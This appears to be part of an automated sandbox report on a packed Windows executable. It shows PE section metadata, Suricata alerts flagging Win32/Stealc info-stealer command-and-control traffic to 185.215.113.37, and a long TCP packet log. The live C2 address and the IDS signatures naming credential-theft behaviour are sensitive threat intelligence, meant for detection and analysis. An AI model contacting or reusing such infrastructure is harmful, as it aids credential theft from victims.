[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	6dc2211f371043aa165435d5c70c48c8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x2a7000	0x200	04d05c6b11f84170fcd18c127b099a22	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nsafravy	0x505000	0x1a2000	0x1a1800	52c957be15431b0dd470121e7e1d797e	False	0.9950154378742515	data	7.953733790704433	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
asnnzaeh	0x6a7000	0x1000	0x600	e38dafd60c4d9fbce6b9e1d6e63ae1ce	False	0.5833333333333334	data	4.962328135217637	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x6a8000	0x3000	0x2200	23778b5a5d54f04956fed25ce8da0fb5	False	0.06192555147058824	DOS executable (COM)	0.7872951509294337	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-24T13:02:03.724481+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:04.011599+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:04.018387+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.6	49711	TCP
2024-10-24T13:02:04.299760+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:04.307986+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.6	49711	TCP
2024-10-24T13:02:05.656800+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:06.169114+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:13.870585+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:15.958196+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:17.270664+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:18.286324+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:20.343684+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP
2024-10-24T13:02:20.815179+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49711	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 24, 2024 13:02:02.493350029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:02.498877048 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:02.498941898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:02.501748085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:02.508224964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:03.418757915 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:03.418881893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:03.424633980 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:03.429980040 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:03.724419117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:03.724481106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:03.725522995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:03.730829954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.011425018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.011450052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.011599064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.011599064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.012938023 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.018387079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299578905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299603939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299618006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299631119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299642086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299654007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.299760103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.300106049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.300453901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.301877975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.307986021 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.587943077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.588002920 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.607732058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.607774019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:04.613018990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.613078117 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.613121033 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.613127947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.613219976 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.613226891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:04.613238096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:05.656740904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:05.656800032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:05.882857084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:05.888402939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169039965 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169070005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169095039 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169109106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169114113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169123888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169137001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169137001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169169903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169173956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169189930 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169204950 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169215918 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169255018 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169855118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169894934 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.169913054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.169960022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.170269966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.170283079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.170310974 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.170336962 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.327797890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.327816963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.327830076 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.327842951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.327918053 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.327934980 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.328088999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.328142881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.328152895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.328166962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.328195095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.328197956 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.328238010 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.328990936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329005957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329020023 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329040051 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.329044104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329058886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.329073906 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.329828024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329842091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329857111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329875946 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.329905033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.329910994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.329952955 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.330537081 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.330588102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.330591917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.330605984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.330635071 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.330651045 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.330691099 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.331367016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.331415892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.331448078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.331490993 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.445838928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.445934057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.487452030 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487513065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.487648010 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487659931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487687111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487699032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487715960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487725019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487735033 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487744093 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487752914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487761974 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487771988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487782001 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487838030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.487875938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487886906 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487895966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.487900019 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.487931013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.488001108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.488013029 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.488022089 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.488063097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.488670111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.488708019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.488727093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.488754034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.490379095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.490387917 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.490398884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.490428925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.490468025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.564747095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.564759016 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.564932108 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.606532097 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606591940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606602907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606605053 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.606623888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606636047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.606636047 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606676102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.606828928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606874943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606875896 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.606885910 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.606918097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.606930971 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607014894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607026100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607037067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607048035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607048988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607069016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607093096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607765913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607775927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607788086 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607799053 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607815027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607848883 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607918978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607932091 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.607956886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.607980967 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.608484983 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.608508110 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.608537912 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.608556032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.609420061 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.609469891 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.609473944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.609481096 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.609514952 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.644915104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.644993067 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.645031929 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.645076036 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.683789015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.683854103 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.683860064 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.683892965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725430012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725450039 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725481033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725507975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725518942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725524902 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725550890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725610971 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725620985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725635052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725656986 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725682020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725857973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725868940 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725878954 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.725908995 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.725929976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726247072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726289034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726315975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726326942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726336956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726347923 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726356983 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726392031 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726811886 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726821899 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726831913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726852894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726875067 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726883888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726886988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.726917028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.726943016 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.728370905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.728380919 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.728390932 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.728419065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.728432894 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.728498936 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.728509903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.728638887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.763710022 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.763721943 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.763767004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.802591085 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.802603960 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.802654028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.802699089 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844084978 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844114065 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844125986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844140053 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844163895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844172001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844202042 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844290972 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844300032 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844331026 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844343901 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844408035 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844453096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844482899 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844494104 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844527006 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.844528913 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844538927 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.844566107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.845032930 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845074892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845082998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.845108986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845110893 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.845155001 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:06.845176935 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845187902 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845199108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:06.845216036 CEST	49711	80	192.168.2.6	185.215.113.37
